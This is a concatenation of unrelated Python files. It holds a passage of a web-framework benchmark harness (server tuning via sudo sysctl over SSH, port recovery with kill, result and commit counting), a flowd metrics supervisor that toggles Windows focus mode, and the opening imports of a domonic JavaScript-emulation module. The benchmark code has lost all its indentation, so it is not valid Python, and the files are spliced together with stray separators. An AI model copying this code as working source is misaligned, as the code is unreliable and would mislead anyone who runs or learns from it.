for test in all_tests:
print test.name
self.__finish()
############################################################
# End run_list_tests
############################################################
############################################################
# Prints the metadata for all the available tests
############################################################
def run_list_test_metadata(self):
all_tests = self.__gather_tests
all_tests_json = json.dumps(map(lambda test: {
"name": test.name,
"approach": test.approach,
"classification": test.classification,
"database": test.database,
"framework": test.framework,
"language": test.language,
"orm": test.orm,
"platform": test.platform,
"webserver": test.webserver,
"os": test.os,
"database_os": test.database_os,
"display_name": test.display_name,
"notes": test.notes,
"versus": test.versus
}, all_tests))
with open(os.path.join(self.full_results_directory(), "test_metadata.json"), "w") as f:
f.write(all_tests_json)
self.__finish()
############################################################
# End run_list_test_metadata
############################################################
############################################################
# parse_timestamp
# Re-parses the raw data for a given timestamp
############################################################
def parse_timestamp(self):
all_tests = self.__gather_tests
for test in all_tests:
test.parse_all()
self.__parse_results(all_tests)
self.__finish()
############################################################
# End parse_timestamp
############################################################
############################################################
# Run the tests:
# This process involves setting up the client/server machines
# with any necessary change. Then going through each test,
# running their setup script, verifying the URLs, and
# running benchmarks against them.
############################################################
def run(self):
##########################
# Get a list of all known
# tests that we can run.
##########################
all_tests = self.__gather_tests
##########################
# Setup client/server
##########################
print header("Preparing Server, Database, and Client ...", top='=', bottom='=')
self.__setup_server()
self.__setup_database()
self.__setup_client()
## Check if wrk (and wrk-pipeline) is installed and executable, if not, raise an exception
#if not (os.access("/usr/local/bin/wrk", os.X_OK) and os.access("/usr/local/bin/wrk-pipeline", os.X_OK)):
# raise Exception("wrk and/or wrk-pipeline are not properly installed. Not running tests.")
##########################
# Run tests
##########################
print header("Running Tests...", top='=', bottom='=')
result = self.__run_tests(all_tests)
##########################
# Parse results
##########################
if self.mode == "benchmark":
print header("Parsing Results ...", top='=', bottom='=')
self.__parse_results(all_tests)
self.__finish()
return result
############################################################
# End run
############################################################
############################################################
# database_sftp_string(batch_file)
# generates a fully qualified URL for sftp to database
############################################################
def database_sftp_string(self, batch_file):
sftp_string = "sftp -oStrictHostKeyChecking=no "
if batch_file != None: sftp_string += " -b " + batch_file + " "
if self.database_identity_file != None:
sftp_string += " -i " + self.database_identity_file + " "
return sftp_string + self.database_user + "@" + self.database_host
############################################################
# End database_sftp_string
############################################################
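    # E.g. (hypothetical values) database_sftp_string("batch.txt") yields
    # something like:
    #   sftp -oStrictHostKeyChecking=no  -b batch.txt  -i db.pem user@dbhost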
############################################################
# client_sftp_string(batch_file)
# generates a fully qualified URL for sftp to client
############################################################
def client_sftp_string(self, batch_file):
sftp_string = "sftp -oStrictHostKeyChecking=no "
if batch_file != None: sftp_string += " -b " + batch_file + " "
if self.client_identity_file != None:
sftp_string += " -i " + self.client_identity_file + " "
return sftp_string + self.client_user + "@" + self.client_host
############################################################
# End client_sftp_string
############################################################
############################################################
# generate_url(url, port)
# generates a fully qualified URL for accessing a test url
############################################################
def generate_url(self, url, port):
return self.server_host + ":" + str(port) + url
############################################################
# End generate_url
############################################################
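    # E.g. (hypothetical host) generate_url("/json", 8080) returns
    # "10.0.0.1:8080/json"; the scheme is left to the caller.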
############################################################
# get_output_file(test_name, test_type)
# returns the output file name for this test_name and
# test_type timestamp/test_type/test_name/raw
############################################################
def get_output_file(self, test_name, test_type):
return os.path.join(self.result_directory, self.timestamp, test_type, test_name, "raw")
############################################################
# End get_output_file
############################################################
############################################################
# output_file(test_name, test_type)
# returns the output file for this test_name and test_type
# timestamp/test_type/test_name/raw
############################################################
def output_file(self, test_name, test_type):
path = self.get_output_file(test_name, test_type)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
############################################################
# End output_file
############################################################
############################################################
# get_stats_file(test_name, test_type)
# returns the stats file name for this test_name and
# test_type timestamp/test_type/test_name/raw
############################################################
def get_stats_file(self, test_name, test_type):
return os.path.join(self.result_directory, self.timestamp, test_type, test_name, "stats")
############################################################
# End get_stats_file
############################################################
############################################################
# stats_file(test_name, test_type)
# returns the stats file for this test_name and test_type
# timestamp/test_type/test_name/raw
############################################################
def stats_file(self, test_name, test_type):
path = self.get_stats_file(test_name, test_type)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
############################################################
# End stats_file
############################################################
############################################################
# full_results_directory
############################################################
def full_results_directory(self):
path = os.path.join(self.result_directory, self.timestamp)
try:
os.makedirs(path)
except OSError:
pass
return path
############################################################
# End full_results_directory
############################################################
############################################################
    # Latest intermediate results directory
############################################################
def latest_results_directory(self):
path = os.path.join(self.result_directory,"latest")
try:
os.makedirs(path)
except OSError:
pass
return path
############################################################
# report_verify_results
# Used by FrameworkTest to add verification details to our results
#
# TODO: Technically this is an IPC violation - we are accessing
# the parent process' memory from the child process
############################################################
def report_verify_results(self, framework, test, result):
if framework.name not in self.results['verify'].keys():
self.results['verify'][framework.name] = dict()
self.results['verify'][framework.name][test] = result
############################################################
# report_benchmark_results
# Used by FrameworkTest to add benchmark data to this
#
# TODO: Technically this is an IPC violation - we are accessing
# the parent process' memory from the child process
############################################################
def report_benchmark_results(self, framework, test, results):
if test not in self.results['rawData'].keys():
self.results['rawData'][test] = dict()
# If results has a size from the parse, then it succeeded.
if results:
self.results['rawData'][test][framework.name] = results
# This may already be set for single-tests
if framework.name not in self.results['succeeded'][test]:
self.results['succeeded'][test].append(framework.name)
else:
# This may already be set for single-tests
if framework.name not in self.results['failed'][test]:
self.results['failed'][test].append(framework.name)
############################################################
# End report_results
############################################################
##########################################################################################
# Private methods
##########################################################################################
############################################################
# Gathers all the tests
############################################################
@property
def __gather_tests(self):
tests = gather_tests(include=self.test,
exclude=self.exclude,
benchmarker=self)
# If the tests have been interrupted somehow, then we want to resume them where we left
# off, rather than starting from the beginning
if os.path.isfile('current_benchmark.txt'):
with open('current_benchmark.txt', 'r') as interrupted_benchmark:
interrupt_bench = interrupted_benchmark.read().strip()
for index, atest in enumerate(tests):
if atest.name == interrupt_bench:
tests = tests[index:]
break
return tests
############################################################
# End __gather_tests
############################################################
############################################################
    # Makes any necessary changes to the server that should be
    # made before running the tests. This involves setting kernel
    # settings to allow for more connections, or more file
    # descriptors
#
# http://redmine.lighttpd.net/projects/weighttp/wiki#Troubleshooting
############################################################
def __setup_server(self):
try:
if os.name == 'nt':
return True
subprocess.check_call(["sudo","bash","-c","cd /sys/devices/system/cpu; ls -d cpu[0-9]*|while read x; do echo performance > $x/cpufreq/scaling_governor; done"])
subprocess.check_call("sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535".rsplit(" "))
subprocess.check_call("sudo sysctl -w net.core.somaxconn=65535".rsplit(" "))
subprocess.check_call("sudo -s ulimit -n 65535".rsplit(" "))
subprocess.check_call("sudo sysctl net.ipv4.tcp_tw_reuse=1".rsplit(" "))
subprocess.check_call("sudo sysctl net.ipv4.tcp_tw_recycle=1".rsplit(" "))
subprocess.check_call("sudo sysctl -w kernel.shmmax=134217728".rsplit(" "))
subprocess.check_call("sudo sysctl -w kernel.shmall=2097152".rsplit(" "))
except subprocess.CalledProcessError:
return False
############################################################
# End __setup_server
############################################################
############################################################
# Makes any necessary changes to the database machine that
# should be made before running the tests. Is very similar
# to the server setup, but may also include database specific
# changes.
############################################################
def __setup_database(self):
p = subprocess.Popen(self.database_ssh_string, stdin=subprocess.PIPE, shell=True)
p.communicate("""
sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535
sudo sysctl -w net.core.somaxconn=65535
sudo -s ulimit -n 65535
sudo sysctl net.ipv4.tcp_tw_reuse=1
sudo sysctl net.ipv4.tcp_tw_recycle=1
sudo sysctl -w kernel.shmmax=2147483648
sudo sysctl -w kernel.shmall=2097152
""")
############################################################
# End __setup_database
############################################################
############################################################
# Makes any necessary changes to the client machine that
# should be made before running the tests. Is very similar
# to the server setup, but may also include client specific
# changes.
############################################################
def __setup_client(self):
p = subprocess.Popen(self.client_ssh_string, stdin=subprocess.PIPE, shell=True)
p.communicate("""
sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535
sudo sysctl -w net.core.somaxconn=65535
sudo -s ulimit -n 65535
sudo sysctl net.ipv4.tcp_tw_reuse=1
sudo sysctl net.ipv4.tcp_tw_recycle=1
sudo sysctl -w kernel.shmmax=2147483648
sudo sysctl -w kernel.shmall=2097152
""")
############################################################
# End __setup_client
############################################################
############################################################
# __run_tests
#
    # 2013-10-02 ASB  Calls each test passed in tests to
    #                 __run_test in a separate process. Each
    #                 test is given a set amount of time, and if
    #                 it exceeds that limit the harness kills the
    #                 child process (and subsequently all of its
    #                 child processes). Uses the multiprocessing
    #                 module.
############################################################
def __run_tests(self, tests):
if len(tests) == 0:
return 0
logging.debug("Start __run_tests.")
logging.debug("__name__ = %s",__name__)
error_happened = False
if self.os.lower() == 'windows':
logging.debug("Executing __run_tests on Windows")
for test in tests:
with open('current_benchmark.txt', 'w') as benchmark_resume_file:
benchmark_resume_file.write(test.name)
if self.__run_test(test) != 0:
error_happened = True
else:
logging.debug("Executing __run_tests on Linux")
# Setup a nice progressbar and ETA indicator
widgets = [self.mode, ': ', progressbar.Percentage(),
' ', progressbar.Bar(),
' Rough ', progressbar.ETA()]
pbar = progressbar.ProgressBar(widgets=widgets, maxval=len(tests)).start()
pbar_test = 0
# These features do not work on Windows
for test in tests:
pbar.update(pbar_test)
pbar_test = pbar_test + 1
if __name__ == 'benchmark.benchmarker':
print header("Running Test: %s" % test.name)
with open('current_benchmark.txt', 'w') as benchmark_resume_file:
benchmark_resume_file.write(test.name)
test_process = Process(target=self.__run_test, name="Test Runner (%s)" % test.name, args=(test,))
test_process.start()
test_process.join(self.run_test_timeout_seconds)
self.__load_results() # Load intermediate result from child process
if(test_process.is_alive()):
logging.debug("Child process for {name} is still alive. Terminating.".format(name=test.name))
self.__write_intermediate_results(test.name,"__run_test timeout (="+ str(self.run_test_timeout_seconds) + " seconds)")
test_process.terminate()
test_process.join()
if test_process.exitcode != 0:
error_happened = True
pbar.finish()
if os.path.isfile('current_benchmark.txt'):
os.remove('current_benchmark.txt')
logging.debug("End __run_tests.")
if error_happened:
return 1
return 0
############################################################
# End __run_tests
############################################################
############################################################
# __run_test
# 2013-10-02 ASB Previously __run_tests. This code now only
# processes a single test.
#
# Ensures that the system has all necessary software to run
# the tests. This does not include that software for the individual
# test, but covers software such as curl and weighttp that
# are needed.
############################################################
def __run_test(self, test):
# Used to capture return values
def exit_with_code(code):
if self.os.lower() == 'windows':
return code
else:
sys.exit(code)
try:
os.makedirs(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name)))
except:
pass
with open(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name), 'out.txt'), 'w') as out, \
open(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name), 'err.txt'), 'w') as err:
if test.os.lower() != self.os.lower() or test.database_os.lower() != self.database_os.lower():
out.write("OS or Database OS specified in benchmark_config does not match the current environment. Skipping.\n")
return exit_with_code(0)
# If the test is in the excludes list, we skip it
if self.exclude != None and test.name in self.exclude:
out.write("Test {name} has been added to the excludes list. Skipping.\n".format(name=test.name))
return exit_with_code(0)
out.write("test.os.lower() = {os} test.database_os.lower() = {dbos}\n".format(os=test.os.lower(),dbos=test.database_os.lower()))
out.write("self.results['frameworks'] != None: {val}\n".format(val=str(self.results['frameworks'] != None)))
out.write("test.name: {name}\n".format(name=str(test.name)))
out.write("self.results['completed']: {completed}\n".format(completed=str(self.results['completed'])))
if self.results['frameworks'] != None and test.name in self.results['completed']:
out.write('Framework {name} found in latest saved data. Skipping.\n'.format(name=str(test.name)))
return exit_with_code(1)
out.flush()
out.write(header("Beginning %s" % test.name, top='='))
out.flush()
##########################
# Start this test
##########################
out.write(header("Starting %s" % test.name))
out.flush()
try:
if test.requires_database():
p = subprocess.Popen(self.database_ssh_string, stdin=subprocess.PIPE, stdout=out, stderr=err, shell=True)
p.communicate("""
sudo restart mysql
sudo restart mongodb
sudo service redis-server restart
sudo /etc/init.d/postgresql restart
""")
time.sleep(10)
if self.__is_port_bound(test.port):
err.write(header("Error: Port %s is not available, attempting to recover" % test.port))
err.flush()
print "Error: Port %s is not available, attempting to recover" % test.port
self.__forciblyEndPortBoundProcesses(test.port, out, err)
if self.__is_port_bound(test.port):
self.__write_intermediate_results(test.name, "port " + str(test.port) + " is not available before start")
err.write(header("Error: Port %s is not available, cannot start %s" % (test.port, test.name)))
err.flush()
print "Error: Unable to recover port, cannot start test"
return exit_with_code(1)
result = test.start(out, err)
if result != 0:
test.stop(out, err)
time.sleep(5)
err.write( "ERROR: Problem starting {name}\n".format(name=test.name) )
err.write(header("Stopped %s" % test.name))
err.flush()
self.__write_intermediate_results(test.name,"<setup.py>#start() returned non-zero")
return exit_with_code(1)
logging.info("Sleeping %s seconds to ensure framework is ready" % self.sleep)
time.sleep(self.sleep)
##########################
# Verify URLs
##########################
logging.info("Verifying framework URLs")
passed_verify = test.verify_urls(out, err)
out.flush()
err.flush()
##########################
# Benchmark this test
##########################
if self.mode == "benchmark":
logging.info("Benchmarking")
out.write(header("Benchmarking %s" % test.name))
out.flush()
test.benchmark(out, err)
out.flush()
err.flush()
##########################
# Stop this test
##########################
out.write(header("Stopping %s" % test.name))
out.flush()
test.stop(out, err)
out.flush()
err.flush()
time.sleep(5)
if self.__is_port_bound(test.port):
err.write("Port %s was not freed. Attempting to free it." % (test.port, ))
err.flush()
self.__forciblyEndPortBoundProcesses(test.port, out, err)
time.sleep(5)
if self.__is_port_bound(test.port):
err.write(header("Error: Port %s was not released by stop %s" % (test.port, test.name)))
err.flush()
self.__write_intermediate_results(test.name, "port " + str(test.port) + " was not released by stop")
return exit_with_code(1)
out.write(header("Stopped %s" % test.name))
out.flush()
time.sleep(5)
##########################################################
# Save results thus far into toolset/benchmark/latest.json
##########################################################
out.write(header("Saving results through %s" % test.name))
out.flush()
self.__write_intermediate_results(test.name,time.strftime("%Y%m%d%H%M%S", time.localtime()))
if self.mode == "verify" and not passed_verify:
print "Failed verify!"
return exit_with_code(1)
except (OSError, IOError, subprocess.CalledProcessError) as e:
self.__write_intermediate_results(test.name,"<setup.py> raised an exception")
err.write(header("Subprocess Error %s" % test.name))
traceback.print_exc(file=err)
err.flush()
try:
test.stop(out, err)
except (subprocess.CalledProcessError) as e:
self.__write_intermediate_results(test.name,"<setup.py>#stop() raised an error")
err.write(header("Subprocess Error: Test .stop() raised exception %s" % test.name))
traceback.print_exc(file=err)
err.flush()
out.close()
err.close()
return exit_with_code(1)
# TODO - subprocess should not catch this exception!
# Parent process should catch it and cleanup/exit
except (KeyboardInterrupt) as e:
test.stop(out, err)
out.write(header("Cleaning up..."))
out.flush()
self.__finish()
sys.exit(1)
out.close()
err.close()
return exit_with_code(0)
############################################################
    # End __run_test
############################################################
############################################################
# __is_port_bound
# Check if the requested port is available. If it
# isn't available, then a previous test probably didn't
# shutdown properly.
############################################################
def __is_port_bound(self, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Try to bind to all IP addresses, this port
s.bind(("", port))
# If we get here, we were able to bind successfully,
# which means the port is free.
except:
# If we get an exception, it might be because the port is still bound
# which would be bad, or maybe it is a privileged port (<1024) and we
# are not running as root, or maybe the server is gone, but sockets are
# still in TIME_WAIT (SO_REUSEADDR). To determine which scenario, try to
# connect.
try:
s.connect(("127.0.0.1", port))
# If we get here, we were able to connect to something, which means
# that the port is still bound.
return True
except:
# An exception means that we couldn't connect, so a server probably
# isn't still running on the port.
pass
finally:
s.close()
return False
############################################################
# End __is_port_bound
############################################################
def __forciblyEndPortBoundProcesses(self, test_port, out, err):
p = subprocess.Popen(['sudo', 'netstat', '-lnp'], stdout=subprocess.PIPE)
(ns_out, ns_err) = p.communicate()
for line in ns_out.splitlines():
# Handles tcp, tcp6, udp, udp6
if line.startswith('tcp') or line.startswith('udp'):
splitline = line.split()
port = int(splitline[3].split(':')[-1])
pid = splitline[-1].split('/')[0]
# Sometimes the last column is just a dash
if pid == '-':
continue
if port > 6000:
ps = subprocess.Popen(['ps','p',pid], stdout=subprocess.PIPE)
(out_6000, err_6000) = ps.communicate()
err.write(textwrap.dedent(
"""
Port {port} should not be open. See the following lines for information
{netstat}
{ps}
""".format(port=port, netstat=line, ps=out_6000)))
err.flush()
if port == test_port:
err.write( header("Error: Test port %s should not be open" % port, bottom='') )
try:
ps = subprocess.Popen(['ps','p',pid], stdout=subprocess.PIPE)
# Store some info about this process
(out_15, err_15) = ps.communicate()
children = subprocess.Popen(['ps','--ppid',pid,'-o','ppid'], stdout=subprocess.PIPE)
(out_children, err_children) = children.communicate()
err.write(" Sending SIGTERM to this process:\n %s\n" % out_15)
err.write(" Also expecting these child processes to die:\n %s\n" % out_children)
subprocess.check_output(['sudo','kill',pid])
# Sleep for 10 sec; kill can be finicky
time.sleep(10)
# Check that PID again
ps = subprocess.Popen(['ps','p',pid], stdout=subprocess.PIPE)
(out_9, err_9) = ps.communicate()
if len(out_9.splitlines()) != 1: # One line for the header row
err.write(" Process is still alive!\n")
err.write(" Sending SIGKILL to this process:\n %s\n" % out_9)
subprocess.check_output(['sudo','kill','-9', pid])
else:
err.write(" Process has been terminated\n")
# Ensure all children are dead
c_pids = [c_pid.strip() for c_pid in out_children.splitlines()[1:]]
for c_pid in c_pids:
ps = subprocess.Popen(['ps','p',c_pid], stdout=subprocess.PIPE)
(out_9, err_9) = ps.communicate()
if len(out_9.splitlines()) != 1: # One line for the header row
err.write(" Child Process %s is still alive, sending SIGKILL\n" % c_pid)
                                subprocess.check_output(['sudo','kill','-9', c_pid])  # kill the child, not the parent pid
except Exception as e:
err.write( " Error: Unknown exception %s\n" % e )
err.write( header("Done attempting to recover port %s" % port, top='') )
############################################################
# __parse_results
# Ensures that the system has all necessary software to run
# the tests. This does not include that software for the individual
# test, but covers software such as curl and weighttp that
# are needed.
############################################################
def __parse_results(self, tests):
        # Run the method to get the commit count of each framework.
self.__count_commits()
# Call the method which counts the sloc for each framework
self.__count_sloc()
# Time to create parsed files
# Aggregate JSON file
with open(os.path.join(self.full_results_directory(), "results.json"), "w") as f:
f.write(json.dumps(self.results, indent=2))
############################################################
# End __parse_results
############################################################
#############################################################
# __count_sloc
#############################################################
def __count_sloc(self):
frameworks = gather_frameworks(include=self.test,
exclude=self.exclude, benchmarker=self)
jsonResult = {}
for framework, testlist in frameworks.iteritems():
if not os.path.exists(os.path.join(testlist[0].directory, "source_code")):
logging.warn("Cannot count lines of code for %s - no 'source_code' file", framework)
continue
# Unfortunately the source_code files use lines like
# ./cpoll_cppsp/www/fortune_old instead of
# ./www/fortune_old
# so we have to back our working dir up one level
wd = os.path.dirname(testlist[0].directory)
try:
command = "cloc --list-file=%s/source_code --yaml" % testlist[0].directory
# Find the last instance of the word 'code' in the yaml output. This should
# be the line count for the sum of all listed files or just the line count
# for the last file in the case where there's only one file listed.
command = command + "| grep code | tail -1 | cut -d: -f 2"
logging.debug("Running \"%s\" (cwd=%s)", command, wd)
lineCount = subprocess.check_output(command, cwd=wd, shell=True)
jsonResult[framework] = int(lineCount)
except subprocess.CalledProcessError:
continue
except ValueError as ve:
logging.warn("Unable to get linecount for %s due to error '%s'", framework, ve)
self.results['rawData']['slocCounts'] = jsonResult
############################################################
# End __count_sloc
############################################################
############################################################
# __count_commits
#
############################################################
def __count_commits(self):
frameworks = gather_frameworks(include=self.test,
exclude=self.exclude, benchmarker=self)
def count_commit(directory, jsonResult):
command = "git rev-list HEAD -- " + directory + " | sort -u | wc -l"
try:
commitCount = subprocess.check_output(command, shell=True)
jsonResult[framework] = int(commitCount)
except subprocess.CalledProcessError:
pass
# Because git can be slow when run in large batches, this
# calls git up to 4 times in parallel. Normal improvement is ~3-4x
# in my trials, or ~100 seconds down to ~25
# This is safe to parallelize as long as each thread only
# accesses one key in the dictionary
threads = []
jsonResult = {}
t1 = datetime.now()
for framework, testlist in frameworks.iteritems():
directory = testlist[0].directory
t = threading.Thread(target=count_commit, args=(directory,jsonResult))
t.start()
threads.append(t)
# Git has internal locks, full parallel will just cause contention
# and slowness, so we rate-limit a bit
if len(threads) >= 4:
threads[0].join()
threads.remove(threads[0])
# Wait for remaining threads
for t in threads:
t.join()
t2 = datetime.now()
# print "Took %s seconds " % (t2 - t1).seconds
self.results['rawData']['commitCounts'] = jsonResult
self.commits = jsonResult
############################################################
# End __count_commits
############################################################
############################################################
# __write_intermediate_results
############################################################
def __write_intermediate_results(self,test_name,status_message):
try:
self.results["completed"][test_name] = status_message
with open(os.path.join(self.latest_results_directory, 'results.json'), 'w') as f:
f.write(json.dumps(self.results, indent=2))
except (IOError):
logging.error("Error writing results.json")
############################################################
# End __write_intermediate_results
############################################################
def __load_results(self):
try:
with open(os.path.join(self.latest_results_directory, 'results.json')) as f:
self.results = json.load(f)
except (ValueError, IOError):
pass
############################################################
# __finish
############################################################
def __finish(self):
tests = self.__gather_tests
# Normally you don't have to use Fore.BLUE before each line, but
# Travis-CI seems to reset color codes on newline (see travis-ci/travis-ci#2692)
# or stream flush, so we have to ensure that the color code is printed repeatedly
prefix = Fore.CYAN
for line in header("Verification Summary", top='=', bottom='').split('\n'):
print prefix + line
for test in tests:
print prefix + "| Test: %s" % test.name
if test.name in self.results['verify'].keys():
for test_type, result in self.results['verify'][test.name].iteritems():
if result.upper() == "PASS":
color = Fore.GREEN
elif result.upper() == "WARN":
color = Fore.YELLOW
else:
color = Fore.RED
print prefix + "| " + test_type.ljust(11) + ' : ' + color + result.upper()
else:
print prefix + "| " + Fore.RED + "NO RESULTS (Did framework launch?)"
print prefix + header('', top='', bottom='=') + Style.RESET_ALL
print "Time to complete: " + str(int(time.time() - self.start_time)) + " seconds"
print "Results are saved in " + os.path.join(self.result_directory, self.timestamp)
############################################################
# End __finish
############################################################
##########################################################################################
# Constructor
##########################################################################################
############################################################
# Initialize the benchmarker. The args are the arguments
# parsed via argparser.
############################################################
def __init__(self, args):
# Map type strings to their objects
types = dict()
types['json'] = JsonTestType()
types['db'] = DBTestType()
types['query'] = QueryTestType()
types['fortune'] = FortuneTestType()
types['update'] = UpdateTestType()
types['plaintext'] = PlaintextTestType()
# Turn type into a map instead of a string
if args['type'] == 'all':
args['types'] = types
else:
args['types'] = { args['type'] : types[args['type']] }
del args['type']
args['max_threads'] = args['threads']
self.__dict__.update(args)
# pprint(self.__dict__)
self.start_time = time.time()
self.run_test_timeout_seconds = 3600
# setup logging
logging.basicConfig(stream=sys.stderr, level=logging.INFO)
# setup some additional variables
if self.database_user == None: self.database_user = self.client_user
if self.database_host == None: self.database_host = self.client_host
if self.database_identity_file == None: self.database_identity_file = self.client_identity_file
# Remember root directory
self.fwroot = setup_util.get_fwroot()
# setup results and latest_results directories
self.result_directory = os.path.join("results", self.name)
self.latest_results_directory = self.latest_results_directory()
if self.parse != None:
self.timestamp = self.parse
else:
self.timestamp = time.strftime("%Y%m%d%H%M%S", time.localtime())
# Load the latest data
#self.latest = None
#try:
# with open('toolset/benchmark/latest.json', 'r') as f:
# # Load json file into config object
# self.latest = json.load(f)
# logging.info("toolset/benchmark/latest.json loaded to self.latest")
# logging.debug("contents of latest.json: " + str(json.dumps(self.latest)))
#except IOError:
# logging.warn("IOError on attempting to read toolset/benchmark/latest.json")
#
#self.results = None
#try:
# if self.latest != None and self.name in self.latest.keys():
# with open(os.path.join(self.result_directory, str(self.latest[self.name]), 'results.json'), 'r') as f:
# # Load json file into config object
# self.results = json.load(f)
#except IOError:
# pass
self.results = None
try:
with open(os.path.join(self.latest_results_directory, 'results.json'), 'r') as f:
#Load json file into results object
self.results = json.load(f)
except IOError:
logging.warn("results.json for test %s not found.",self.name)
if self.results == None:
self.results = dict()
self.results['name'] = self.name
self.results['concurrencyLevels'] = self.concurrency_levels
self.results['queryIntervals'] = self.query_levels
self.results['frameworks'] = [t.name for t in self.__gather_tests]
self.results['duration'] = self.duration
self.results['rawData'] = dict()
self.results['rawData']['json'] = dict()
self.results['rawData']['db'] = dict()
self.results['rawData']['query'] = dict()
self.results['rawData']['fortune'] = dict()
self.results['rawData']['update'] = dict()
self.results['rawData']['plaintext'] = dict()
self.results['completed'] = dict()
self.results['succeeded'] = dict()
self.results['succeeded']['json'] = []
self.results['succeeded']['db'] = []
self.results['succeeded']['query'] = []
self.results['succeeded']['fortune'] = []
self.results['succeeded']['update'] = []
self.results['succeeded']['plaintext'] = []
self.results['failed'] = dict()
self.results['failed']['json'] = []
self.results['failed']['db'] = []
self.results['failed']['query'] = []
self.results['failed']['fortune'] = []
self.results['failed']['update'] = []
self.results['failed']['plaintext'] = []
self.results['verify'] = dict()
else:
#for x in self.__gather_tests():
# if x.name not in self.results['frameworks']:
# self.results['frameworks'] = self.results['frameworks'] + [x.name]
# Always overwrite framework list
self.results['frameworks'] = [t.name for t in self.__gather_tests]
# Setup the ssh command string
self.database_ssh_string = "ssh -T -o StrictHostKeyChecking=no " + self.database_user + "@" + self.database_host
self.client_ssh_string = "ssh -T -o StrictHostKeyChecking=no " + self.client_user + "@" + self.client_host
if self.database_identity_file != None:
self.database_ssh_string = self.database_ssh_string + " -i " + self.database_identity_file
if self.client_identity_file != None:
self.client_ssh_string = self.client_ssh_string + " -i " + self.client_identity_file
if self.install is not None:
install = Installer(self, self.install_strategy)
install.install_software()
############################################################
# End __init__
############################################################
|
supervisor.py
|
import datetime
import importlib
import logging
import time
import os
import threading
from pathlib import Path
from types import ModuleType
from typing import List
from typing import Optional
from flowd.model import logistic_regression
from flowd.utils import wnf
import pythoncom
from flowd import metrics
MetricModules = List[ModuleType]
Collectors = List[metrics.BaseCollector]
class Supervisor:
"""Does all the initial setup and manages the lifecycle
of metric collectors."""
def __init__(self) -> None:
self.collect_interval: float = 60
self.collected_data_path = os.path.expanduser("~/flowd/")
self._collectors: Collectors = []
self._quit = threading.Event()
self._active: List[CollectorThread] = []
self._data: Optional[str] = None
self._data_pivot: Optional[str] = None
self.model = logistic_regression.train_model()
self.flow_threshold = 70
self._fs_data: Optional[str] = None
self._flow_state = 0
@staticmethod
def _sort_collectors(element):
name, v = element.get_current_state()
return name
def configure(self) -> None:
os.makedirs(self.collected_data_path, exist_ok=True)
self._data = os.path.join(self.collected_data_path, "data.csv")
self._data_pivot = os.path.join(self.collected_data_path, "data_pivot.csv")
self._fs_data = os.path.join(self.collected_data_path, "fs_data.csv")
logging.info(f"storing collected data in {self._data}")
self._collectors = lookup_handlers(collect_metric_modules())
self._collectors.sort(key=self._sort_collectors)
self.write_headers()
def write_headers(self) -> None:
if not os.path.exists(self._data_pivot) or os.path.getsize(self._data_pivot) == 0:
with open(self._data_pivot, "a") as f1:
header = "date"
for c in self._collectors:
name, v = c.get_current_state()
header = f"{header},{name}"
f1.write(f"{header}\n")
if not os.path.exists(self._fs_data) or os.path.getsize(self._fs_data) == 0:
with open(self._fs_data, "a") as fs:
fs.write("Date,Flow State Prediction (%)\n")
def run(self) -> None:
if not self._collectors:
logging.error(
"we didn't find any collector implementations, nothing to do"
)
return
logging.info("began collecting metrics")
self._active = [CollectorThread(c) for c in self._collectors]
for t in self._active:
t.start()
while not self._quit.is_set():
time.sleep(self.collect_interval)
threading.Thread(target=self.output_collected_metrics).start()
self._flow_state = self.check_flow_state()
wnf.set_focus_mode(2 if self._flow_state > self.flow_threshold else 0)
def check_flow_state(self) -> float:
p = logistic_regression.predict(logistic_regression.pivot_stats(), self.model, 15) * 100
logging.info(f'Last 15 minutes prediction {p}%')
return p
    def stop(self, timeout: Optional[float] = None) -> None:
self._quit.set()
for c in self._active:
c._collector.stop_collect()
c.join(timeout)
def output_collected_metrics(self) -> None:
if not self._data:
logging.warning("unknown data file path; did you call configure()?")
return
ts = datetime.datetime.now()
with open(self._data, "a") as f:
with open(self._data_pivot, "a") as f1:
row = ""
for ct in self._active:
name, current = ct.pop()
if not ct.is_alive():
current = -1
f.write(f"{name},{current},{ts}\n")
row = f"{row},{current}"
f1.write(f"{ts}{row}\n")
with open(self._fs_data, "a") as fs:
fs.write(f"{ts},{self._flow_state}\n")
class CollectorThread(threading.Thread):
"""A collector interface-aware thread wrapper."""
def __init__(self, collector: metrics.BaseCollector) -> None:
self._collector = collector
super().__init__(
name=f"CollectorThread-{self._collector.metric_name}", daemon=True
)
def run(self) -> None:
pythoncom.CoInitialize()
try:
self._collector.start_collect()
except Exception as e:
logging.error(f"Unexpected error in {self.name}: {e}", exc_info=True)
return
finally:
pythoncom.CoUninitialize()
self._collector.stop_collect()
def pop(self) -> metrics.CollectedData:
v = self._collector.get_current_state()
self._collector.cleanup()
return v
def collect_metric_modules() -> MetricModules:
"""Gets a list of all available metric modules
from the metrics package. Doesn't do any filtering or collector lookups."""
# TODO(alex): check how well the runtime module
# collection works when compiled to a binary
logging.debug("looking for collectors in the metrics module")
mods = []
metrics_pkg_path = Path(metrics.__file__).parent
for file in metrics_pkg_path.glob("*"):
if file.suffix not in (".py", ".pyc", ".pyd"):
continue
if file.stem == "__init__":
continue
module_name = ".".join([metrics.__name__, file.stem])
try:
module = importlib.import_module(module_name)
except (ImportError, AttributeError) as e:
logging.error(e)
continue
mods.append(module)
return mods
def lookup_handlers(mods: MetricModules) -> Collectors:
"""Gets a list of handlers from list of metric modules."""
collectors = []
for m in mods:
for v in m.__dict__.values():
try:
if v and issubclass(v, metrics.BaseCollector):
collectors.append(v())
logging.info(
f"found a metric collector {m.__name__}:{v.metric_name}"
)
except TypeError:
continue
return collectors
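# Illustrative wiring of the discovery helpers above (a sketch of what
# configure() already does internally):
#
#   mods = collect_metric_modules()        # import every module in the metrics package
#   collectors = lookup_handlers(mods)     # instantiate each BaseCollector subclass found
#   for c in collectors:
#       name, value = c.get_current_state()
#       print(name, value)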
|
javascript.py
|
"""
domonic.javascript
====================================
- https://www.w3schools.com/jsref/jsref_reference.asp
- https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference
"""
import array
import chunk
import datetime
from datetime import timezone
import gc
import json
